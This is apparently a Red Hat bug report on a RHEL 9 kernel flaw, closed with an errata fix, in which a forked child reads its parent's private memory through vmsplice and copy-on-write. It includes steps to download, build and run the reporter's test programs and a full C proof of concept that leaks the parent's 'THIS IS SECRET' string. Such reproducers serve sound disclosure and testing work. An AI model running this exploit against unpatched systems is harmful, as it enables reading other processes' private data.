Bug 1958742

Summary: RHEL9: fix for "CoW after fork()" aka "vmsplice child -> parent attack" aka "GUP after fork()" bug
Product: Red Hat Enterprise Linux 9
Reporter: Andrea Arcangeli <aarcange>
Component: kernel
Assignee: Andrea Arcangeli <aarcange>
kernel sub component: Memory Management
QA Contact: Li Wang <liwan>
Status: CLOSED ERRATA
Docs Contact:
Severity: low
Priority: unspecified
CC: aarcange, aquini, cye, ddutile, hkrzesin, knoel, mm-maint, peterx
Version: 9.0
Keywords: Triaged
Target Milestone: beta
Target Release: 9.0
Hardware: All
OS: Linux
Whiteboard:
Fixed In Version: kernel-5.14.0-43.el9
Doc Type: No Doc Update
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2022-05-17 15:38:18 UTC
Type: Bug
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:

Description Andrea Arcangeli 2021-05-10 04:41:34 UTC
Description of two problems (the first is a longstanding security issue that has been easily reproducible since vmsplice was introduced; the second is a user ABI break vs RHEL8 and all kernels before commit 09854ba94c6aad7886996bfbee2530b3d8a7f4f4):

1) the child can read private memory of the parent process misusing get_user_pages (easy to reproduce with vmsplice as vector)

2) wrprotecting any pinned page, no matter whether it is short term or FOLL_LONGTERM, FOLL_PIN or FOLL_GET, may result in silent user data corruption. It has become a userland bug to wrprotect any page that may be pinned, with mprotect(), clear_refs or any other MM code that has the capability of wrprotecting memory.

How reproducible: for 1) I modified the original testcase posted by Jann Horn on 27 May 2020 to show it still reproduces the security issue upstream.

Steps to Reproduce defect 1):

$ wget https://raw.githubusercontent.com/aagit/kernel-testcases-for-v5.11/main/vmsplice-v5.11.c
$ gcc vmsplice-v5.11.c -o vmsplice-v5.11 -O2
$ ./vmsplice-v5.11

Actual results: read string from child: THIS IS SECRET

Expected results: read string from child: BORING DATA

Steps to Reproduce defect 2):

$ wget https://raw.githubusercontent.com/aagit/kernel-testcases-for-v5.11/main/page_count_do_wp_page.c
$ gcc -o page_count_do_wp_page page_count_do_wp_page.c -O2 -lpthread
$ ./page_count_do_wp_page /tmp/whatever

Actual results: random memory corruption (not happening in RHEL8 or any kernel before 09854ba94c6aad7886996bfbee2530b3d8a7f4f4 broke the user ABI)

Expected results: same behavior as RHEL8, no output from this testcase, no user ABI break
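
The following program is an added illustration of defect 1 for readers of this bug; it is not vmsplice-v5.11.c and not code from the reporter. It reconstructs the pattern of the original May 2020 child-to-parent vmsplice testcase that the description refers to: the child pins the CoW-shared anonymous page into a pipe with vmsplice() (get_user_pages, FOLL_GET), unmaps it so the page_mapcount drops back to 1, and then reads the page out of the pipe after the parent has written "THIS IS SECRET" over "BORING DATA". The function name cow_after_fork_probe, the handshake pipes and the exit codes are assumptions made for this example; the two strings are the ones quoted in the actual/expected results above.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Added illustration of defect 1 (CoW after fork, child -> parent read via
 * vmsplice).  Reconstructs the pattern of Jann Horn's May 2020 testcase; it
 * is NOT the vmsplice-v5.11.c file referenced in the bug.  Copies the string
 * the child observed through the pipe into `out` and returns 0, or returns -1
 * when the probe could not run (fork/pipe/vmsplice refused by the sandbox).
 */
int cow_after_fork_probe(char *out, size_t outlen)
{
    long pagesz = sysconf(_SC_PAGESIZE);
    if (pagesz <= 0 || outlen < 2)
        return -1;

    /* Private anonymous page; after fork() it is shared CoW with the child. */
    char *page = mmap(NULL, (size_t)pagesz, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;
    strcpy(page, "BORING DATA");

    /* data: vmsplice target; ready/go: handshake; result: child's report. */
    int data[2], ready[2], go[2], result[2];
    if (pipe(data) || pipe(ready) || pipe(go) || pipe(result)) {
        munmap(page, (size_t)pagesz);
        return -1;
    }

    pid_t child = fork();
    if (child < 0) {
        munmap(page, (size_t)pagesz);
        return -1;
    }

    if (child == 0) {
        char buf[64] = { 0 };
        char c;
        /* 1. Pin the shared page into the pipe buffer without copying it. */
        struct iovec iov = { .iov_base = page, .iov_len = (size_t)pagesz };
        ssize_t n = vmsplice(data[1], &iov, 1, 0);
        /* 2. Unmap it: page_mapcount is 1 again (parent only), but the pipe
         *    still holds an extra reference from get_user_pages(). */
        munmap(page, (size_t)pagesz);
        if (n != pagesz)
            _exit(2);
        /* 3. Let the parent write its secret, then wait for it to finish. */
        if (write(ready[1], "r", 1) != 1 || read(go[0], &c, 1) != 1)
            _exit(3);
        /* 4. Read the pinned page back.  A do_wp_page() that reused the page
         *    in place during the parent's CoW fault now hands us the secret. */
        if (read(data[0], buf, sizeof buf - 1) <= 0)
            _exit(4);
        if (write(result[1], buf, strlen(buf) + 1) < 0)
            _exit(5);
        _exit(0);
    }

    /* Parent: drop the ends only the child writes on, so a child that bails
     * out yields EOF instead of a hang. */
    close(ready[1]);
    close(result[1]);
    close(go[0]);

    char c;
    int status = -1;
    if (read(ready[0], &c, 1) == 1) {
        /* Faults on the write-protected PTE left by fork().  A vulnerable
         * kernel reuses the pinned page (mapcount == 1); a fixed one copies. */
        strcpy(page, "THIS IS SECRET");
        if (write(go[1], "g", 1) == 1) {
            ssize_t n = read(result[0], out, outlen - 1);
            if (n > 0) {
                out[n] = '\0';
                status = 0;
            } else {
                out[0] = '\0';
            }
        }
    }
    int wstatus = 0;
    waitpid(child, &wstatus, 0);
    if (!WIFEXITED(wstatus) || WEXITSTATUS(wstatus) != 0)
        status = -1;
    munmap(page, (size_t)pagesz);
    close(data[0]); close(data[1]); close(ready[0]); close(go[1]); close(result[0]);
    return status;
}

int main(void)
{
    char seen[64];
    if (cow_after_fork_probe(seen, sizeof seen) != 0) {
        fprintf(stderr, "probe could not run in this environment\n");
        return 1;
    }
    printf("read string from child: %s\n", seen);
    return 0;
}
```

Build with gcc -O2 and run it unprivileged. A kernel that reuses the page in place on the parent's CoW fault prints "read string from child: THIS IS SECRET"; RHEL 9 with kernel-5.14.0-43.el9 or later (and any upstream kernel with page-count based reuse) prints "BORING DATA". Note that vmsplice-v5.11.c reaches the issue through a different sequence that still reproduced upstream at v5.11, so a "BORING DATA" result from this reconstruction is not by itself proof that a host carries the fix for this bug; check the installed kernel against the Fixed In Version field and run the reporter's testcase.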

Comment 25 errata-xmlrpc 2022-05-17 15:38:18 UTC
Since the problem described in this bug report should be
resolved in a recent advisory, it has been closed with a
resolution of ERRATA.

For information on the advisory (new packages: kernel), and where to find the updated
files, follow the link below.

If the solution does not work for you, open a new bug report.

https://access.redhat.com/errata/RHBA-2022:3907